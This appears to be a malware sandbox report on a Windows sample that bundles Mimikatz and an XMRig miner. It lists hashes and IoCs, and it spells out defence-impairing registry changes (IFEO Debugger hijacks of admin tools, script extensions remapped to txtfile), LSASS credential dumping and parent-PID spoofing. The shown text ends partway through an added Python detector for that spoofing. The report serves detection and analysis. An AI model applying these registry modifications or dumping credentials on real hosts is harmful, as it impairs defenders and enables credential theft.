Analysis
  max time kernel:   150s
  max time network:  151s
  platform:          windows10-2004_x64
  resource:          win10v2004-20241007-en
  resource tags:     arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  submitted:         16-11-2024 07:34
Behavioral task behavioral1
  Sample:    2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
  Resource:  win7-20241023-en
Behavioral task behavioral2
  Sample:    2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
  Resource:  win10v2004-20241007-en
General
  Target:  2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
  Size:    9.8MB
  MD5:     91e69467e6449f40d3b16eaecb505043
  SHA1:    c51cc29b2b524ff59d41e5a73a83951824cc49bb
  SHA256:  ba8fe6b5c6d587b9c9e720a72ebfe2165f1eb9abc329c67f9503867ea86b7c9e
  SHA512:  72aa66007729c58c872548fc71f3bda1350cbaa09d13331f96023660aaaf1da82334f07322393bf63175cc02845295e0ee606410b316801c5a5a0c69e75b20ed
  SSDEEP:  196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
- Mimikatz
  mimikatz is an open source tool to dump credentials on Windows.
- Mimikatz family
- Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
  description | pid | Process | procid_target
  PID 3964 created 2132 | 3964 | snutqkl.exe | 38
- Xmrig family
- Contacts a large (20244) amount of remote hosts (1 TTP)
  This may indicate a network scan to discover remotely running services.
- Creates a large amount of network flows (1 TTP)
  This may indicate a network scan to discover remotely running services.
- OS Credential Dumping: LSASS Memory (1 TTP)
  Malicious access to Credentials History.
- XMRig Miner payload (10 IoCs)
  resource | yara_rule
  behavioral2/memory/3980-178-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-182-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-203-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-216-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-225-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-234-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-247-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-496-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-498-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
  behavioral2/memory/3980-549-0x00007FF612120000-0x00007FF612240000-memory.dmp | xmrig
- mimikatz is an open source tool to dump credentials on Windows (5 IoCs)
  resource | yara_rule
  behavioral2/memory/4640-0-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
  behavioral2/memory/4640-4-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
  behavioral2/files/0x000a000000023b92-5.dat | mimikatz
  behavioral2/memory/4076-8-0x0000000000400000-0x0000000000A9B000-memory.dmp | mimikatz
  behavioral2/memory/4392-138-0x00007FF7D9B70000-0x00007FF7D9C5E000-memory.dmp | mimikatz
- Drops file in Drivers directory (3 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | snutqkl.exe
  File created | C:\Windows\system32\drivers\npf.sys | wpcap.exe
  File created | C:\Windows\system32\drivers\etc\hosts | snutqkl.exe
- Event Triggered Execution: Image File Execution Options Injection (1 TTP, 40 IoCs)
  Every key below sits under \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ and every entry is written by snutqkl.exe. A Debugger value under an IFEO key makes Windows start that "debugger" instead of the named program, so pointing each one at svchost.exe effectively stops these administrative and scripting tools from running normally on the host.
  description | ioc
  Set value (str) | cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | WmiPrvSE.exe
  Set value (str) | icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | magnify.exe
  Key created | bitsadmin.exe
  Key created | Regsvr32.exe
  Set value (str) | bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | wscript.exe
  Key created | cscript.exe
  Key created | taskkill.exe
  Set value (str) | reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | at.exe
  Set value (str) | wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | takeown.exe
  Set value (str) | regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | icacls.exe
  Key created | regini.exe
  Key created | reg.exe
  Set value (str) | at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | powershell.exe
  Key created | rundll32.exe
  Key created | mshta.exe
  Set value (str) | WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | perfmon.exe
  Set value (str) | certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | WinSAT.exe
  Set value (str) | takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | certutil.exe
  Set value (str) | Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Set value (str) | WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | netsh.exe
  Set value (str) | netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
  Key created | sethc.exe
  Set value (str) | sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe"
- Modifies Windows Firewall (2 TTPs, 2 IoCs)
  pid | Process
  4012 | netsh.exe
  4576 | netsh.exe
- Executes dropped EXE (28 IoCs)
  pid | Process
  4076 | snutqkl.exe
  3964 | snutqkl.exe
  1540 | wpcap.exe
  556 | vltbbrlit.exe
  4392 | vfshost.exe
  2188 | iulpaulua.exe
  2528 | xohudmc.exe
  4844 | nspfoo.exe
  3980 | jtpawa.exe
  2544 | iulpaulua.exe
  768 | iulpaulua.exe
  4856 | iulpaulua.exe
  4360 | iulpaulua.exe
  2436 | iulpaulua.exe
  4620 | iulpaulua.exe
  512 | snutqkl.exe
  4460 | iulpaulua.exe
  2456 | iulpaulua.exe
  4556 | iulpaulua.exe
  5080 | iulpaulua.exe
  3724 | iulpaulua.exe
  3620 | iulpaulua.exe
  3228 | iulpaulua.exe
  2844 | iulpaulua.exe
  3284 | iulpaulua.exe
  2052 | iulpaulua.exe
  1628 | ngliteqrb.exe
  6092 | snutqkl.exe
- Loads dropped DLL (12 IoCs)
  Identical records are collapsed; the count column gives the number of entries.
  pid | Process | count
  1540 | wpcap.exe | 9
  556 | vltbbrlit.exe | 3
- Checks installed software on the system (1 TTP)
  Looks up Uninstall key entries in the registry to enumerate software on the system.
- Looks up external IP address via web service (2 IoCs)
  Uses a legitimate IP lookup service to find the infected system's external IP.
  flow | ioc
  67 | ifconfig.me
  68 | ifconfig.me
- Creates a Windows Service
- Drops file in System32 directory (18 IoCs)
  description | ioc | Process
  File created | C:\Windows\SysWOW64\wpcap.dll | wpcap.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\088D7AA6D7DCA369223412E8DEF831B8 | snutqkl.exe
  File created | C:\Windows\system32\wpcap.dll | wpcap.exe
  File opened for modification | C:\Windows\SysWOW64\nspfoo.exe | xohudmc.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 | snutqkl.exe
  File created | C:\Windows\SysWOW64\pthreadVC.dll | wpcap.exe
  File created | C:\Windows\SysWOW64\Packet.dll | wpcap.exe
  File created | C:\Windows\system32\Packet.dll | wpcap.exe
  File created | C:\Windows\SysWOW64\nspfoo.exe | xohudmc.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | snutqkl.exe
  File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\088D7AA6D7DCA369223412E8DEF831B8 | snutqkl.exe
  resource | yara_rule
  behavioral2/files/0x0008000000023c49-135.dat | upx
  behavioral2/memory/4392-136-0x00007FF7D9B70000-0x00007FF7D9C5E000-memory.dmp | upx
  behavioral2/memory/4392-138-0x00007FF7D9B70000-0x00007FF7D9C5E000-memory.dmp | upx
  behavioral2/files/0x0008000000023c80-141.dat | upx
  behavioral2/memory/2188-142-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/2188-160-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-165-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/files/0x0016000000023c6a-163.dat | upx
  behavioral2/memory/2544-171-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/768-175-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-178-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/4856-180-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-182-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/4360-185-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/2436-189-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/4620-193-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/4460-201-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-203-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/2456-206-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/4556-210-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/5080-214-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-216-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/3724-219-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3620-223-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-225-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/3228-228-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/2844-231-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3284-233-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-234-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/2052-236-0x00007FF6CAC80000-0x00007FF6CACDB000-memory.dmp | upx
  behavioral2/memory/3980-247-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/3980-496-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/3980-498-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
  behavioral2/memory/3980-549-0x00007FF612120000-0x00007FF612240000-memory.dmp | upx
- Drops file in Program Files directory (3 IoCs)
  description | ioc | Process
  File created | C:\Program Files\WinPcap\rpcapd.exe | wpcap.exe
  File created | C:\Program Files\WinPcap\LICENSE | wpcap.exe
  File created | C:\Program Files\WinPcap\uninstall.exe | wpcap.exe
- Drops file in Windows directory (60 IoCs)
  description | ioc | Process
  File opened for modification | C:\Windows\fpibtvet\snutqkl.exe | 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\coli-0.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\crli-0.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\trch-1.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\docmicfg.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\svschost.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\Corporate\vfshost.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\taatftcev\ip.txt | snutqkl.exe
  File created | C:\Windows\mtemsclch\taatftcev\Packet.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\ssleay32.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.xml | snutqkl.exe
  File opened for modification | C:\Windows\fpibtvet\spoolsrv.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\AppCapture64.dll | snutqkl.exe
  File created | C:\Windows\fpibtvet\snutqkl.exe | 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
  File created | C:\Windows\mtemsclch\taatftcev\ngliteqrb.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\cnli-1.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\trfo-2.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\posh-0.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\xdvl-0.dll | snutqkl.exe
  File opened for modification | C:\Windows\fpibtvet\docmicfg.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\AppCapture32.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\svschost.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\spoolsrv.xml | snutqkl.exe
  File opened for modification | C:\Windows\fpibtvet\svschost.xml | snutqkl.exe
  File opened for modification | C:\Windows\mtemsclch\taatftcev\Packet.dll | snutqkl.exe
  File created | C:\Windows\fpibtvet\spoolsrv.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\taatftcev\vltbbrlit.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\taatftcev\wpcap.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\docmicfg.exe | snutqkl.exe
  File created | C:\Windows\ime\snutqkl.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\tucl-1.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\ucl.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\vimpcsvc.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\schoedcl.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\Shellcode.ini | snutqkl.exe
  File created | C:\Windows\mtemsclch\taatftcev\wpcap.exe | snutqkl.exe
  File created | C:\Windows\fpibtvet\schoedcl.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\tibe-2.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\Corporate\mimilib.dll | snutqkl.exe
  File created | C:\Windows\fpibtvet\vimpcsvc.xml | snutqkl.exe
  File opened for modification | C:\Windows\fpibtvet\vimpcsvc.xml | snutqkl.exe
  File opened for modification | C:\Windows\fpibtvet\schoedcl.xml | snutqkl.exe
  File opened for modification | C:\Windows\mtemsclch\Corporate\log.txt | cmd.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\libeay32.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\exma-1.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\libxml2.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\svschost.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\spoolsrv.exe | snutqkl.exe
  File created | C:\Windows\fpibtvet\svschost.xml | snutqkl.exe
  File created | C:\Windows\fpibtvet\docmicfg.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\specials\zlib1.dll | snutqkl.exe
  File created | C:\Windows\mtemsclch\upbdrjv\swrpwe.exe | snutqkl.exe
  File created | C:\Windows\mtemsclch\taatftcev\scan.bat | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\vimpcsvc.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\UnattendGC\schoedcl.xml | snutqkl.exe
  File created | C:\Windows\mtemsclch\Corporate\mimidrv.sys | snutqkl.exe
  File opened for modification | C:\Windows\mtemsclch\taatftcev\Result.txt | ngliteqrb.exe
- Launches sc.exe (4 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid | Process
  4188 | sc.exe
  1848 | sc.exe
  2172 | sc.exe
  4876 | sc.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Event Triggered Execution: Netsh Helper DLL (1 TTP, 51 IoCs)
  Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
  All 51 entries reference the key \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh from process netsh.exe; identical records are collapsed and the count column gives the number of entries.
  description | ioc | Process | count
  Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe | 17
  Key queried | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe | 17
  Key value enumerated | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh | netsh.exe | 17
- System Location Discovery: System Language Discovery (1 TTP, 64 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  Every entry is "Key opened" on \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language; identical records are collapsed by process and the count column gives the number of entries.
  Process | count
  cmd.exe | 19
  netsh.exe | 14
  net1.exe | 8
  net.exe | 7
  cacls.exe | 4
  sc.exe | 3
  schtasks.exe | 3
  snutqkl.exe | 2
  2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe | 1
  ngliteqrb.exe | 1
  nspfoo.exe | 1
  wpcap.exe | 1
- System Network Configuration Discovery: Internet Connection Discovery (1 TTP, 2 IoCs)
  Adversaries may check for Internet connectivity on compromised systems.
  pid | Process
  2720 | cmd.exe
  1184 | PING.EXE
- NSIS installer (3 IoCs)
  resource | yara_rule
  behavioral2/files/0x000a000000023b92-5.dat | nsis_installer_2
  behavioral2/files/0x000b000000023ba9-15.dat | nsis_installer_1
  behavioral2/files/0x000b000000023ba9-15.dat | nsis_installer_2
- Modifies data under HKEY_USERS (43 IoCs)
  Identical records are collapsed; the count column gives the number of entries.
  description | ioc | Process | count
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" | iulpaulua.exe | 17
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump | iulpaulua.exe | 17
  Key created | \REGISTRY\USER\.DEFAULT\Software | iulpaulua.exe | 1
  Key created | \REGISTRY\USER\.DEFAULT\Software\Sysinternals | iulpaulua.exe | 1
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | iulpaulua.exe | 1
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing | snutqkl.exe | 1
  Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | snutqkl.exe | 1
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | snutqkl.exe | 1
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" | snutqkl.exe | 1
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | snutqkl.exe | 1
  Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" | snutqkl.exe | 1
Modifies registry class 14 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" | snutqkl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" | snutqkl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" | snutqkl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" | snutqkl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" | snutqkl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" | snutqkl.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ | snutqkl.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" | snutqkl.exe
The default ProgID of every common script extension (.bat, .cmd, .vbs, .vbe, .js, .ps1, .reg) is repointed to txtfile, so a script opened through the shell launches the text editor instead of its interpreter. This hampers administrators' clean-up scripts and competing malware on the host; it does not affect snutqkl.exe itself, which is an EXE started directly. -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 1184 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3240 schtasks.exe 4252 schtasks.exe 3200 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process
3964 snutqkl.exe (all 64 entries are this one process) -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process
656 Process not Found (all 15 entries; the sandbox could not resolve PID 656 to an image) -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 4640 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 23 IoCs
description | pid | Process
Token: SeDebugPrivilege | 4640 | 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe
Token: SeDebugPrivilege | 4076 | snutqkl.exe
Token: SeDebugPrivilege | 3964 | snutqkl.exe
Token: SeDebugPrivilege | 4392 | vfshost.exe
Token: SeDebugPrivilege | 2188 | iulpaulua.exe
Token: SeLockMemoryPrivilege | 3980 | jtpawa.exe
Token: SeLockMemoryPrivilege | 3980 | jtpawa.exe
Token: SeDebugPrivilege | 2544 | iulpaulua.exe
Token: SeDebugPrivilege | 768 | iulpaulua.exe
Token: SeDebugPrivilege | 4856 | iulpaulua.exe
Token: SeDebugPrivilege | 4360 | iulpaulua.exe
Token: SeDebugPrivilege | 2436 | iulpaulua.exe
Token: SeDebugPrivilege | 4620 | iulpaulua.exe
Token: SeDebugPrivilege | 4460 | iulpaulua.exe
Token: SeDebugPrivilege | 2456 | iulpaulua.exe
Token: SeDebugPrivilege | 4556 | iulpaulua.exe
Token: SeDebugPrivilege | 5080 | iulpaulua.exe
Token: SeDebugPrivilege | 3724 | iulpaulua.exe
Token: SeDebugPrivilege | 3620 | iulpaulua.exe
Token: SeDebugPrivilege | 3228 | iulpaulua.exe
Token: SeDebugPrivilege | 2844 | iulpaulua.exe
Token: SeDebugPrivilege | 3284 | iulpaulua.exe
Token: SeDebugPrivilege | 2052 | iulpaulua.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid | Process | occurrences
4640 | 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe | 2
4076 | snutqkl.exe | 2
3964 | snutqkl.exe | 2
2528 | xohudmc.exe | 1
4844 | nspfoo.exe | 1
512 | snutqkl.exe | 2
6092 | snutqkl.exe | 2 -
Suspicious use of WriteProcessMemory 64 IoCs
description | pid | Process | procid_target | occurrences
PID 4640 wrote to memory of 2720 | 4640 | 2024-11-16_91e69467e6449f40d3b16eaecb505043_hacktools_icedid_mimikatz.exe | 83 | 3
PID 2720 wrote to memory of 1184 | 2720 | cmd.exe | 87 | 3
PID 2720 wrote to memory of 4076 | 2720 | cmd.exe | 95 | 3
PID 3964 wrote to memory of 1300 | 3964 | snutqkl.exe | 97 | 3
PID 1300 wrote to memory of 4548 | 1300 | cmd.exe | 99 | 3
PID 1300 wrote to memory of 1804 | 1300 | cmd.exe | 100 | 3
PID 1300 wrote to memory of 976 | 1300 | cmd.exe | 103 | 3
PID 1300 wrote to memory of 60 | 1300 | cmd.exe | 104 | 3
PID 1300 wrote to memory of 3488 | 1300 | cmd.exe | 106 | 3
PID 1300 wrote to memory of 4504 | 1300 | cmd.exe | 107 | 3
PID 3964 wrote to memory of 2044 | 3964 | snutqkl.exe | 112 | 3
PID 3964 wrote to memory of 4640 | 3964 | snutqkl.exe | 114 | 3
PID 3964 wrote to memory of 1264 | 3964 | snutqkl.exe | 116 | 3
PID 3964 wrote to memory of 3396 | 3964 | snutqkl.exe | 121 | 3
PID 3396 wrote to memory of 1540 | 3396 | cmd.exe | 123 | 3
PID 1540 wrote to memory of 4332 | 1540 | wpcap.exe | 124 | 3
PID 4332 wrote to memory of 840 | 4332 | net.exe | 126 | 3
PID 1540 wrote to memory of 532 | 1540 | wpcap.exe | 127 | 3
PID 532 wrote to memory of 2324 | 532 | net.exe | 129 | 3
PID 1540 wrote to memory of 3128 | 1540 | wpcap.exe | 130 | 3
PID 3128 wrote to memory of 3876 | 3128 | net.exe | 132 | 3
PID 1540 wrote to memory of 1804 | 1540 | wpcap.exe | 133 | 1 (list truncated at 64 entries)
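The sandbox tags snutqkl.exe (PID 3964) with NtCreateUserProcessOtherParentProcess, and in the process tree the dropped jtpawa.exe (PID 3980, the one process here that asks for SeLockMemoryPrivilege, the large-page privilege XMRig requests) shows up as a child of spoolsv.exe (PID 2132), a process that never writes to it in the WriteProcessMemory list. That is parent-PID spoofing: the real creator hands CreateProcess a handle to the chosen parent through PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, and that handle must carry PROCESS_CREATE_PROCESS (0x0080). The block below is an added example, not part of the report or of any project it names: it correlates Sysmon-style ProcessAccess records (Event ID 10) against ProcessCreate records (Event ID 1) to recover the likely creator. The records are constructed to mirror this tree; the timestamps, the GrantedAccess masks and the Taskmgr.exe decoy are assumptions.

```python
"""Flag parent-PID spoofing by correlating Sysmon-style events.

Added example; not the sandbox's own logic.  Spoofing a parent needs a handle
to the target with PROCESS_CREATE_PROCESS (0x0080), so a ProcessAccess record
from a third process on the claimed parent, shortly before the ProcessCreate,
gives the real creator away.  Sample records below are constructed to mirror
the report's tree (snutqkl.exe 3964 -> jtpawa.exe 3980 parented to spoolsv.exe
2132); timestamps, access masks and the Taskmgr decoy are assumptions.
"""
from dataclasses import dataclass
from typing import Iterable, List

PROCESS_CREATE_PROCESS = 0x0080   # access right needed to name a process as parent


@dataclass(frozen=True)
class ProcessAccess:             # Sysmon Event ID 10
    ts: int
    source_pid: int
    source_image: str
    target_pid: int
    target_image: str
    granted_access: int


@dataclass(frozen=True)
class ProcessCreate:             # Sysmon Event ID 1
    ts: int
    pid: int
    image: str
    parent_pid: int
    parent_image: str


@dataclass(frozen=True)
class Finding:
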